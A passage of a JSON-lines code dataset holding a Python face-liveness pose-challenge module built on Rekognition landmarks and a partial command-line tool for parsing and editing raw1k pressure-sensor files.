{"api_name": "PySide2.QtWidgets", "line_number": 227, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 228, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 228, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 233, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 236, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 236, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 237, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 237, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 238, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 238, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 239, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 239, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 250, "usage_type": "call"}, {"api_name": "resources.url_plus", "line_number": 250, "usage_type": "argument"}, {"api_name": "PySide2.QtGui", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 251, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 251, "usage_type": "name"}]} +{"seq_id": "6099401739", "text": "import logging\nimport secrets\n\nfrom .framework import challenge_params, challenge_state\nfrom .framework import CHALLENGE_SUCCESS, CHALLENGE_FAIL\n\n_log = logging.getLogger('liveness-backend')\n\nPOSE_EYS = ['OPEN', 'CLOSED', 'LOOKING_LEFT', 'LOOKING_RIGHT']\nPOSE_MOUTH = ['CLOSED', 'SMILE']\n\nREKOGNITION_FACE_MIN_CONFIDENCE = 90\nREKOGNITION_FACE_MAX_ROTATION = 20\nEYE_DIRECTION_AREA_MULTIPLIER = 1.2 # the bigger the value, more permissive\n\n\n@challenge_params(challenge_type='POSE')\ndef pose_challenge_params(client_metadata):\n image_width = int(client_metadata['imageWidth'])\n image_height = int(client_metadata['imageHeight'])\n params = dict()\n params['imageWidth'] = image_width\n params['imageHeight'] = image_height\n params['pose'] = {\n 'eyes': secrets.choice(POSE_EYS),\n 'mouth': secrets.choice(POSE_MOUTH)\n }\n return params\n\n\n@challenge_state(challenge_type='POSE', first=True)\ndef first_state(params, frame, _context):\n _log.debug(f'Params: {params}')\n _log.debug(f'Frame: {frame}')\n\n faces = frame['rekMetadata']\n num_faces = len(faces)\n _log.debug(f'Number of faces: {num_faces}')\n if num_faces != 1:\n _log.info(f'FAIL: Number of faces. Expected: 1 Actual: {num_faces}')\n return CHALLENGE_FAIL\n\n face = faces[0]\n confidence = face['Confidence']\n _log.debug(f'Confidence: {confidence}')\n if face['Confidence'] < REKOGNITION_FACE_MIN_CONFIDENCE:\n _log.info(f'FAIL: Confidence. Expected: {REKOGNITION_FACE_MIN_CONFIDENCE} Actual: {confidence}')\n return CHALLENGE_FAIL\n\n rotation_pose = face['Pose']\n _log.debug(f'Rotation: {rotation_pose}')\n if _is_rotated(rotation_pose):\n _log.info(f'FAIL: Face rotation. Expected: {REKOGNITION_FACE_MAX_ROTATION} Actual: {rotation_pose}')\n return CHALLENGE_FAIL\n\n expected_eyes = params['pose']['eyes']\n if not _are_eyes_correct(expected_eyes, face):\n _log.info(f'FAIL: Eyes. Expected: {expected_eyes}')\n return CHALLENGE_FAIL\n\n expected_mouth = params['pose']['mouth']\n if not _is_mouth_correct(expected_mouth, face):\n _log.info(f'FAIL: Mouth. Expected: {expected_mouth}')\n return CHALLENGE_FAIL\n\n _log.info(f'Success!')\n return CHALLENGE_SUCCESS\n\n\ndef _is_rotated(pose):\n return (abs(pose['Roll']) > REKOGNITION_FACE_MAX_ROTATION or\n abs(pose['Yaw']) > REKOGNITION_FACE_MAX_ROTATION or\n abs(pose['Pitch']) > REKOGNITION_FACE_MAX_ROTATION)\n\n\ndef _is_mouth_correct(expected, face):\n should_smile = expected == 'SMILE'\n is_smiling = face['Smile']['Value']\n is_mouth_open = face['MouthOpen']['Value']\n _log.debug(f'Smiling: {is_smiling} Mouth open: {is_mouth_open}')\n return (should_smile and is_smiling and is_mouth_open) or (\n not should_smile and not is_smiling and not is_mouth_open)\n\n\ndef _are_eyes_correct(expected, face):\n are_open = face['EyesOpen']['Value']\n _log.debug(f'Eyes open: {are_open}')\n if (expected == 'CLOSED' and are_open) or (expected != 'CLOSED' and not are_open):\n return False\n\n eye_left, eye_right = _get_eyes_coordinates(face['Landmarks'])\n _log.debug(f'Eyes coordinates - Left: {eye_left} Right: {eye_right}')\n eye_left_direction = _get_eye_direction(eye_left)\n _log.debug(f'Left eye direction: {eye_left_direction}')\n if _is_eye_opposite_direction(eye_left_direction, expected):\n _log.debug(f'Wrong left eye direction. Expected: {expected} Actual: {eye_left_direction}')\n return False\n eye_right_direction = _get_eye_direction(eye_right)\n _log.debug(f'Right eye direction: {eye_right_direction}')\n if _is_eye_opposite_direction(eye_right_direction, expected):\n _log.debug(f'Wrong right eye direction. Expected: {expected} Actual: {eye_right_direction}')\n return False\n return True\n\n\ndef _get_eyes_coordinates(landmarks):\n eye_left = {}\n eye_right = {}\n for landmark in landmarks:\n if landmark['Type'] == 'rightEyeLeft':\n eye_right['left'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'rightEyeRight':\n eye_right['right'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'rightPupil':\n eye_right['pupil'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftEyeLeft':\n eye_left['left'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftEyeRight':\n eye_left['right'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftPupil':\n eye_left['pupil'] = {'x': landmark['X'], 'y': landmark['Y']}\n return eye_left, eye_right\n\n\ndef _get_eye_direction(eye):\n one_third_of_eye_width = (eye['right']['x'] - eye['left']['x']) / 3\n if eye['pupil']['x'] <= eye['left']['x'] + one_third_of_eye_width * EYE_DIRECTION_AREA_MULTIPLIER:\n return 'LOOKING_LEFT'\n elif eye['pupil']['x'] >= eye['right']['x'] - one_third_of_eye_width * EYE_DIRECTION_AREA_MULTIPLIER:\n return 'LOOKING_RIGHT'\n return 'OPEN'\n\n\ndef _is_eye_opposite_direction(direction, expected):\n return (direction == 'LOOKING_LEFT' and expected == 'LOOKING_RIGHT') or (\n direction == 'LOOKING_RIGHT' and expected == 'LOOKING_LEFT')\n", "repo_name": "aws-solutions/liveness-detection-framework", "sub_path": "source/backend/chalicelib/pose.py", "file_name": "pose.py", "file_ext": "py", "file_size_in_byte": 5306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "secrets.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "secrets.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "framework.challenge_params", "line_number": 17, "usage_type": "call"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 41, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 48, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 54, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 59, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 64, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_SUCCESS", "line_number": 67, "usage_type": "name"}, {"api_name": "framework.challenge_state", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "12884897091", "text": "#! /usr/bin/env python3\n\"\"\"\nScript to parse raw1k files and output data\n\"\"\"\nimport argparse\nimport datetime\nimport gzip\nimport io\nimport itertools\nimport json\nimport logging\nimport multiprocessing\nimport shutil\nimport struct\nimport sys\n\nimport progress_bar\nimport pytz\n\nLOG = logging.getLogger()\nLOG_HANDLE = logging.StreamHandler()\nLOG_FORMAT = logging.Formatter(\n \"%(asctime)s %(name)-8s %(levelname)-8s \"\n \"%(message)s\", \"%Y-%m-%d %H:%M:%S\")\nLOG_HANDLE.setFormatter(LOG_FORMAT)\nLOG.addHandler(LOG_HANDLE)\nDEFAULT_TAGS = \"tags.json\"\nSIDE_LOOKUP = {\"keep\": -1, \"left\": 1, \"right\": 0, \"both\": 2}\nDEFAULT_SIDE_OPTION = \"keep\"\nDEFAULT_SIDE_VALUE = SIDE_LOOKUP[DEFAULT_SIDE_OPTION]\nTIME_METAVAR = \"HH:MM:SS\"\nUNSUPPORTED = \"UNSUPPORTED\"\n\n\ndef main():\n \"\"\" Main function for raw1k parsing \"\"\"\n args = argument_parsing()\n set_log_level(args.verbosity)\n tags = import_json_tags(args.tags)\n\n if args.filter:\n tags = filter_tags(tags, args)\n\n if args.subcommand == \"modify\":\n LOG.info(\"Duplicating %s\", args.input)\n shutil.copyfile(args.input, args.output)\n LOG.info(\"Finding and changing timestamps\")\n modify_raw1k_file(args.input,\n args.output,\n tags,\n date=args.date,\n time=args.time,\n start_time=args.start,\n end_time=args.end,\n side=args.side)\n LOG.info(\"Timestamps changed. Modified file saved as %s\", args.output)\n elif args.subcommand == \"raw\":\n LOG.info(\"Parsing %s\", args.input)\n parsed_raw_file = parse_raw1k_file(args.input, tags)\n export_raw_pressure_data(parsed_raw_file, args.output)\n elif args.subcommand == \"dump\":\n LOG.info(\"Parsing %s\", args.input)\n parsed_raw_file = parse_raw1k_file(args.input, tags, bool(args.filter), raw=args.raw)\n export_raw1k_json_file(parsed_raw_file, args.output)\n sys.exit(0)\n\n\n####################\n# ARGUMENT PARSING #\n####################\n\n\ndef argument_parsing():\n \"\"\" Parse the command line arguments \"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n subparsers = parser.add_subparsers(dest=\"subcommand\")\n # sub parser for json output\n dump_description = \"Dump raw1k to JSON\"\n dump_parser = subparsers.add_parser(\n \"dump\",\n description=dump_description,\n help=dump_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n dump_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n dump_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output json file\")\n dump_parser.add_argument(\"-t\",\n \"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n dump_parser.add_argument(\"--raw\",\n action=\"store_true\",\n default=False,\n help=\"Add raw pressure values to json file\")\n dump_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n\n dump_parser.add_argument(\"-f\",\n \"--filter\",\n nargs='*',\n help=\"Filter output tags\")\n\n # sub parser for raw pressure output\n raw_description = \"Dump raw pressure values to a single file\"\n raw_parser = subparsers.add_parser(\n \"raw\",\n description=raw_description,\n help=raw_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n raw_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n raw_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output raw pressure file\")\n raw_parser.add_argument(\"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n raw_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n\n # sub parser for raw1k output\n raw1k_description = \"Modify aspects of a raw1k file\"\n modify_parser = subparsers.add_parser(\n \"modify\",\n description=raw1k_description,\n help=raw1k_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n conflict_handler=\"resolve\")\n modify_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n modify_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output raw pressure file\")\n modify_parser.add_argument(\"-t\",\n \"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n modify_parser.add_argument(\"--side\",\n choices=SIDE_LOOKUP,\n default=DEFAULT_SIDE_OPTION,\n help=\"Set the sleeper to a specific side\")\n modify_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n time = modify_parser.add_argument_group(\"Time Modification\")\n time.add_argument(\"-d\",\n \"--date\",\n type=validate_date,\n required=False,\n metavar=\"YYYY-MM-DD\",\n help=\"desired date\")\n time.add_argument(\"-t\",\n \"--time\",\n type=validate_time,\n required=False,\n metavar=TIME_METAVAR,\n help=\"change timestamp start time\")\n\n truncate = modify_parser.add_argument_group(\"Truncate\")\n truncate.add_argument(\"-s\",\n \"--start\",\n type=validate_time,\n metavar=TIME_METAVAR,\n help=\"Specify start time of truncated sample\")\n truncate.add_argument(\"-e\",\n \"--end\",\n type=validate_time,\n metavar=TIME_METAVAR,\n help=\"Specify end time of truncated sample\")\n # Parse the arguments\n args = parser.parse_args()\n return args\n\n\ndef validate_date(in_string):\n \"\"\" Validate the entered date from the command line \"\"\"\n try:\n return datetime.datetime.strptime(in_string, \"%Y-%m-%d\").date()\n except ValueError:\n raise argparse.ArgumentTypeError(\n 'Date must be entered as \"YYYY-MM-DD\"')\n\n\ndef validate_time(in_string):\n \"\"\" Validate the entered time from the command line \"\"\"\n try:\n return datetime.datetime.strptime(in_string, \"%H:%M:%S\").time()\n except ValueError:\n raise argparse.ArgumentTypeError(\n 'Time must be entered as \"{}\"'.format(TIME_METAVAR))\n\n\ndef set_log_level(verbosity):\n \"\"\" Set the log level of the application \"\"\"\n if verbosity == 0:\n LOG.setLevel(logging.WARNING)\n elif verbosity == 1:\n LOG.setLevel(logging.INFO)\n else:\n LOG.setLevel(logging.DEBUG)\n return\n\n\n###########################\n# RAW1K PARSING FUNCTIONS #\n###########################\n\n\ndef import_json_timezones(input_file_path):\n \"\"\" Import timezones as a json file into a dictionary for parsing \"\"\"\n with open(input_file_path) as tags_json:\n return json.load(tags_json)\n\n\ndef import_json_tags(input_file_path):\n \"\"\" Import tags as a json file into a dictionary for parsing \"\"\"\n with open(input_file_path) as tags_json:\n return json.load(tags_json)\n\n\ndef parse_raw1k_file(input_file_path, tags, filter_input=False, raw=True, show_bar=True):\n \"\"\" Read in the raw1k file and parse it into a dictionary\"\"\"\n packet_parsers = create_packet_parser_lookup(tags)\n tag_lookup_dict = create_tag_lookup_dict(tags)\n packets_to_parse = {}\n with open(input_file_path, \"rb\") as raw1k:\n if show_bar:\n file_read_bar = progress_bar.InitBarForInfile(input_file_path)\n # Get and parse header\n file_header = parse_file_header(file=raw1k,\n tags=tags,\n packet_parsers=packet_parsers,\n filter_input=filter_input)\n packets = {\"header\": file_header}\n # Get rest of packets\n for packet_id, packet in enumerate(packets_in_file(raw1k)):\n packet[\"data\"] = read_raw_bytes(raw1k, packet[\"packet_size\"])\n raw_data_size = read_short(raw1k) # Length of compressed data\n packet[\"compressed_data\"] = read_raw_bytes(raw1k, raw_data_size)\n packets_to_parse[packet_id] = packet\n if show_bar:\n file_read_bar(raw1k.tell())\n if show_bar:\n del file_read_bar\n with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:\n if show_bar:\n bar_size = len(packets_to_parse)\n parse_bar = progress_bar.InitBar(title=\"Parsing\", size=bar_size)\n parse_packet_tasks = {}\n # Set up multi processing tasks for parsing each packet\n for packet_id, packet in packets_to_parse.items():\n parse_packet_tasks[packet_id] = pool.apply_async(\n parse_packet, (\n packet,\n tags,\n packet_parsers,\n tag_lookup_dict,\n raw,\n filter_input,\n ))\n # Get the parsed tags for each packet\n for packet_id, parsed_packet in parse_packet_tasks.items():\n packets[packet_id] = parsed_packet.get()\n if show_bar:\n parse_bar(packet_id)\n return packets\n\n\ndef parse_packet(packet, tags, packet_parsers, tag_lookup_dict, raw, filter_input):\n \"\"\" Parse tags in a packet\"\"\"\n with io.BytesIO(packet[\"data\"]) as packet_data:\n repeat_tags = {}\n parsed_tags = {\n \"time_stamp\": packet[\"time_stamp\"],\n \"packet_size\": packet[\"packet_size\"]\n }\n for tag_id in packet_tag_ids(packet_data, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n if filter_input and tag_name == UNSUPPORTED:\n continue\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if tag_name in parsed_tags:\n repeat_tags[tag_id] = repeat_tags.get(tag_id, 0) + 1\n tag_name = \"{}-{}\".format(tag_name, repeat_tags[tag_id])\n parsed_tag = parse_tag(packet_data, tag_id, packet_parser)\n parsed_tags[tag_name] = parsed_tag\n # Parse Raw Data/compressed section\n raw_tags = parse_compressed_data(packet[\"compressed_data\"], tags,\n packet_parsers, raw)\n for tag_name, tag_data in raw_tags.items():\n if filter_input and tag_name == UNSUPPORTED:\n continue\n parsed_tags[tag_name] = tag_data\n return parsed_tags\n\n\nBYTES_IN_PACKET_HEADER = 10\nSIZE_BYTES = 2\nSENSOR_SERIAL_NUMBER_TAG = 331\nTIME_ZONE_TAG = 202\nTIME_TAGS = {350, 351} # DSP and RAWDATA timestamps\n\n\ndef modify_raw1k_file(input_file_path, output_file_path, tags, **kwargs):\n \"\"\" Change time stamp in raw1k file \"\"\"\n show_bar = LOG.getEffectiveLevel() < logging.WARNING\n with open(input_file_path, \"rb\") as raw1k, open(output_file_path,\n \"r+b\") as output_file:\n if show_bar:\n current_progress_bar = progress_bar.InitBarForInfile(\n input_file_path)\n # Truncate Arguments\n start_time = kwargs.pop(\"start_time\")\n end_time = kwargs.pop(\"end_time\")\n truncate = bool(start_time and end_time) and start_time != end_time\n # Time modification arguments\n date = kwargs.pop(\"date\")\n time = kwargs.pop(\"time\")\n modify_time = bool(date or time)\n time_offset = 0\n # Header modifications\n timezone = get_time_zone(raw1k, tags)\n modify_file_header(raw1k, output_file, tags, **kwargs)\n end_of_header = raw1k.tell()\n for packet_header in packets_in_file(raw1k):\n if modify_time:\n if not time_offset:\n time_offset = get_time_stamp_offset(\n packet_header[\"time_stamp\"], date, time, timezone)\n location = raw1k.tell() - BYTES_IN_PACKET_HEADER\n update_timestamp(output_file, location, time_offset)\n # Find beginning of time slice\n if truncate and is_matching_packet(\n start_time, packet_header[\"time_stamp\"], timezone):\n LOG.debug(\"Found start of time slice offset: %d\", raw1k.tell())\n start_offset = raw1k.tell() - BYTES_IN_PACKET_HEADER\n # Parse all tags in packet\n for tag_id in packet_tag_ids(raw1k, tags):\n # Update the timestamps\n if modify_time and tag_id in TIME_TAGS:\n location = raw1k.tell() + SIZE_BYTES\n update_timestamp(output_file, location, time_offset)\n parse_tag(raw1k, tag_id, default_parser)\n # Skip reading the raw data section\n raw_data_size = read_short(raw1k)\n skip_bytes(raw1k, raw_data_size)\n # Find end of time slice\n if truncate and is_matching_packet(\n end_time, packet_header[\"time_stamp\"], timezone):\n LOG.debug(\"Found end of time slice offset: %d\", raw1k.tell())\n end_offset = raw1k.tell()\n raw1k.seek(0, 2) # Seek to the end of the file\n break\n if show_bar:\n current_progress_bar(raw1k.tell())\n if show_bar:\n current_progress_bar(raw1k.tell()) # Update progress one last time\n del current_progress_bar\n if truncate:\n truncate_raw1k(end_of_header, start_offset, end_offset,\n output_file_path)\n\n\nBYTES_IN_FILE_HEADER = 34\n\n\ndef get_time_zone(input_file, tags):\n \"\"\" Get the timezone from the header \"\"\"\n skip_bytes(input_file, BYTES_IN_FILE_HEADER)\n for tag_id in packet_tag_ids(input_file, tags):\n if tag_id == TIME_ZONE_TAG:\n parsed_tag = parse_tag(input_file, tag_id, time_zone, packed=True)\n timezone = parsed_tag[\"m_time_zone\"]\n input_file.seek(0)\n return timezone\n parse_tag(input_file, tag_id, default_parser, packed=True)\n raise TypeError(\"File does not contain time zone information\")\n\n\ndef modify_file_header(input_file, output_file, tags, **kwargs):\n \"\"\" Parse raw1k file header \"\"\"\n side = kwargs.pop(\"side\")\n edit_side = side in SIDE_LOOKUP and side != DEFAULT_SIDE_OPTION\n side = SIDE_LOOKUP.get(side, DEFAULT_SIDE_VALUE)\n skip_bytes(input_file, BYTES_IN_FILE_HEADER) # Skip file header values\n for tag_id in packet_tag_ids(input_file, tags):\n if edit_side and tag_id == SENSOR_SERIAL_NUMBER_TAG:\n location = input_file.tell() + SIZE_BYTES\n update_side(output_file, location, side)\n parse_tag(input_file, tag_id, default_parser, packed=True)\n\n\ndef packet_tag_ids(file, tags):\n \"\"\" Generator for packet ids to allow for use in a for loop\"\"\"\n while True:\n tag_id = read_short(file)\n if tag_id == get_tag_id(\"TAG_END_OF_LIST\", tags, tag_not_found=0):\n break\n yield tag_id\n\n\ndef packets_in_file(file):\n \"\"\" Generator for packet ids to allow for use in a for loop\"\"\"\n while True:\n try:\n time_stamp = read_long(file)\n packet_size = read_short(file)\n packet_header = {\n 'time_stamp': time_stamp,\n 'packet_size': packet_size\n }\n yield packet_header\n except struct.error:\n # Got to the end of the file\n break\n\n\ndef create_tag_lookup_dict(tags):\n \"\"\" Create a dict of tags keyed on tag_id with values being the string \"\"\"\n tag_lookup = {}\n for tag in tags:\n if tag not in tag_lookup:\n tag_lookup[tags[tag]['tag']] = tag\n return tag_lookup\n\n\ndef parse_tag(file, tag_id, packet_parser, packed=False):\n \"\"\"\n Parses a given tag_id from a file. Returns a dict with parsed information\n \"\"\"\n byte_length = read_short(file)\n word_length = (byte_length + 3) >> 2\n byte_padding_length = (word_length * 4 - byte_length)\n # Get the correct packet parser\n to_return = packet_parser(file=file, tag=tag_id, byte_length=byte_length)\n if byte_padding_length and not packed:\n skip_bytes(file, byte_padding_length)\n return to_return\n\n\ndef parse_compressed_data(compressed, tags, packet_parsers, raw):\n \"\"\" Parse the compressed data at the end of the data packet\"\"\"\n tag_lookup_dict = create_tag_lookup_dict(tags)\n decompressed = gzip.decompress(compressed)\n parsed_tags = {}\n with io.BytesIO(decompressed) as uncompressed:\n for tag_id in packet_tag_ids(uncompressed, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if not raw and tag_name == \"TAG_A2D_CH_DATA_32\":\n parse_tag(uncompressed, tag_id, default_parser,\n packed=True) # Skip reading in the raw data\n else:\n parsed_tags[tag_name] = parse_tag(uncompressed,\n tag_id,\n packet_parser,\n packed=True)\n return parsed_tags\n\n\ndef export_raw1k_json_file(raw1k_dict, output_file_path):\n \"\"\" Export a JSON file of the parsed raw file\"\"\"\n LOG.info(\"Dumping json data to %s\", output_file_path)\n write_bar = progress_bar.InitBar(title=output_file_path,\n size=len(raw1k_dict))\n with open(output_file_path, \"w+\") as raw1k_json:\n raw1k_json.write(\"{\\n\")\n for packet_id, parsed_packet in enumerate(raw1k_dict.items()):\n packet, data = parsed_packet\n if packet_id < len(raw1k_dict) - 1: # Correct for 0 based indexing\n raw1k_json.write(\" \\\"{}\\\": {},\\n\".format(\n packet, json.dumps(data)))\n else: # omit comma for last packet\n raw1k_json.write(\" \\\"{}\\\": {}\\n\".format(\n packet, json.dumps(data)))\n write_bar(packet_id)\n raw1k_json.write(\"}\\n\")\n LOG.info(\"JSON data dumped to %s\", output_file_path)\n\n\ndef export_raw_pressure_data(raw1k_dict, output_file_path):\n \"\"\" Export a binary file with only raw pressure data \"\"\"\n LOG.info(\"Exporting raw pressure data to %s\", output_file_path)\n with open(output_file_path, \"wb+\") as raw_pressure:\n for entry in raw1k_dict:\n if 'TAG_A2D_CH_DATA_32' not in raw1k_dict[entry].keys():\n continue\n samples = raw1k_dict[entry]['TAG_A2D_CH_DATA_32']['m_samples']\n for sample in samples:\n raw_pressure.write(struct.pack('i', sample))\n LOG.info(\"Raw pressure data exported to %s\", output_file_path)\n\n\ndef get_time_stamp_offset(time_stamp, set_date, set_time, timezone):\n \"\"\" Calculate the offset of the between the original raw1k timestamp and the\n desired timestamp.\n \"\"\"\n base_datetime = datetime.datetime.fromtimestamp(time_stamp / 1000)\n base_date = base_datetime.date()\n base_time = base_datetime.time()\n if set_date is None:\n set_date = base_date\n if set_time is None:\n set_time = base_time\n set_datetime = datetime.datetime.combine(set_date, set_time)\n set_datetime = pytz.timezone(timezone).localize(set_datetime)\n set_time_stamp = datetime.datetime.timestamp(set_datetime) * 1000\n LOG.debug(\"Timestamp derived from given date and time is %d\",\n set_time_stamp)\n LOG.debug(\"Raw1k timestamp starts at %d\", time_stamp)\n offset = set_time_stamp - time_stamp\n LOG.debug(\"Timestamp offset is %d\", offset)\n return offset\n\n\ndef is_matching_packet(goal_time, time_stamp, timezone):\n \"\"\" determine if the current packet is the starting packet of the desired\n sample.\n \"\"\"\n base_datetime = datetime.datetime.fromtimestamp(time_stamp / 1000)\n base_datetime = pytz.timezone(timezone).localize(base_datetime)\n goal_datetime = datetime.datetime.combine(base_datetime.date(), goal_time)\n goal_datetime = pytz.timezone(timezone).localize(goal_datetime)\n return base_datetime == goal_datetime\n\n\n##################\n# FILE UTILITIES #\n##################\n\n\ndef read_short(file):\n \"\"\" Read 2 bytes and then unpack and return as a short\"\"\"\n return struct.unpack(\"h\", file.read(2))[0]\n\n\ndef read_int(file):\n \"\"\" Read 4 bytes, unpack, return as an integer\"\"\"\n return struct.unpack(\"i\", file.read(4))[0]\n\n\ndef read_byte(file):\n \"\"\" Read in 1 byte\"\"\"\n return int.from_bytes(file.read(1), byteorder='little')\n\n\ndef read_long(file):\n \"\"\" Read 8 bytes, unpack, return as a long long \"\"\"\n return struct.unpack(\"q\", file.read(8))[0]\n\n\ndef read_boolean(file):\n \"\"\" Read 1 byte, unpack and return as a boolean \"\"\"\n return struct.unpack(\"?\", file.read(1))[0]\n\n\ndef read_string(file, length):\n \"\"\" Read a string of characters from binary file, return string\"\"\"\n return file.read(length).decode('utf-8')\n\n\ndef read_raw_bytes(file, length):\n \"\"\" Read raw bytes and return them \"\"\"\n return file.read(length)\n\n\ndef skip_bytes(file, bytes_to_skip=1):\n \"\"\" Skip bytes in file \"\"\"\n file.seek(file.tell() + bytes_to_skip)\n\n\ndef write_int(file, value):\n \"\"\" Write an integer to a file \"\"\"\n to_write = struct.pack(\"i\", int(value))\n file.write(to_write)\n\n\ndef write_long(file, value):\n \"\"\" Write a long to a file \"\"\"\n to_write = struct.pack(\"q\", int(value))\n file.write(to_write)\n\n\n###############\n# TAG PARSERS #\n###############\n\n\ndef create_packet_parser_lookup(tags):\n \"\"\" Match a tag to the appropriate packet parser. Return packet parser for tag \"\"\"\n # yapf: disable\n packet_parsers = {\n get_tag_id(\"TAG_AVG_RAW_DATA\", tags): avg_raw_data,\n get_tag_id(\"TAG_PROCESSED_AVG_THRESHOLD_DATA\", tags): processed_avg_threshold_data,\n get_tag_id(\"TAG_PROCESSED_PAD_ANGLE\", tags): processed_pad_angle,\n get_tag_id(\"TAG_PROCESSED_PRESENCE\", tags): processed_presence,\n get_tag_id(\"TAG_DEVICE_COMMAND\", tags): device_command,\n get_tag_id(\"TAG_PUMP_STATUS\", tags): pump_status,\n get_tag_id(\"TAG_PUMP_STATUS_2\", tags): pump_status_2,\n get_tag_id(\"TAG_BIOMETRICS\", tags): biometrics,\n get_tag_id(\"TAG_PROCESSED_DRIFT\", tags): processed_drift,\n get_tag_id(\"TAG_PROCESSED_SNR\", tags): processed_snr,\n get_tag_id(\"TAG_ALGO_INIT\", tags): algo_init,\n get_tag_id(\"TAG_PROCESSED_DATA\", tags): processed_data,\n get_tag_id(\"TAG_SMART_ALARM\", tags): smart_alarm,\n get_tag_id(\"TAG_XPORT_RAW_DATA_FOOTER\", tags): xport_raw_data_footer,\n get_tag_id(\"TAG_PROCESSED_ALERT\", tags): processed_alert,\n get_tag_id(\"TAG_ALGO_VERSION\", tags): algo_version,\n get_tag_id(\"TAG_OUT_BYEDGEDETECT\", tags): out_byedgedetect,\n get_tag_id(\"TAG_ALL_FFT_POWER\", tags): all_fft_power,\n get_tag_id(\"TAG_A2D_OFFSET\", tags): a2d_offset,\n get_tag_id(\"TAG_INFO_FOR_ALGO\", tags): info_for_algo,\n get_tag_id(\"TAG_DSP_SEQ_NUM\", tags): dsp_seq_number,\n get_tag_id(\"TAG_RAWDATA_SEQ_NUM\", tags): rawdata_seq_number,\n get_tag_id(\"TAG_RDP_SEQ_NUM\", tags): rdp_seq_num,\n get_tag_id(\"TAG_RDP_VERSION\", tags): rdp_version,\n get_tag_id(\"TAG_DSP_TIMESTAMP\", tags): dsp_timestamp,\n get_tag_id(\"TAG_RAWDATA_TIMESTAMP\", tags): rawdata_timestamp,\n get_tag_id(\"TAG_DEVICE_ID\", tags): device_id,\n get_tag_id(\"TAG_USER_ID\", tags): user_id,\n get_tag_id(\"TAG_START_TIME\", tags): parse_start_time,\n get_tag_id(\"TAG_END_TIME\", tags): parse_end_time,\n get_tag_id(\"TAG_A2D_N_CHANNELS\", tags): a2d_channels,\n get_tag_id(\"TAG_A2D_SAMPLES_CH\", tags): a2d_samples_channel,\n get_tag_id(\"TAG_A2D_SAMPLE_PERIOD\", tags): a2d_sample_period,\n get_tag_id(\"TAG_DEVICE_CONFIG\", tags): device_config,\n get_tag_id(\"TAG_TIME_ZONE\", tags): time_zone,\n get_tag_id(\"TAG_IS_COMPRESSED\", tags): is_compressed,\n get_tag_id(\"TAG_HARDWARE_VER\", tags): hardware_version,\n get_tag_id(\"TAG_HEADER_ALGO_VERSION\", tags): header_algo_version,\n get_tag_id(\"TAG_HEADER_ATM_PRESSURE_OFFSET\", tags): header_atm_pressure_offset,\n get_tag_id(\"TAG_HEADER_ALGO_RUNNINGON\", tags): header_algo_running_on,\n get_tag_id(\"TAG_HEADER_INFO_FOR_ALGO\", tags): header_info_for_algo,\n get_tag_id(\"TAG_LAST_PACKET_POSITION\", tags): last_packet_position,\n get_tag_id(\"TAG_A2D_CH_DATA_32\", tags): a2d_ch_data_32,\n 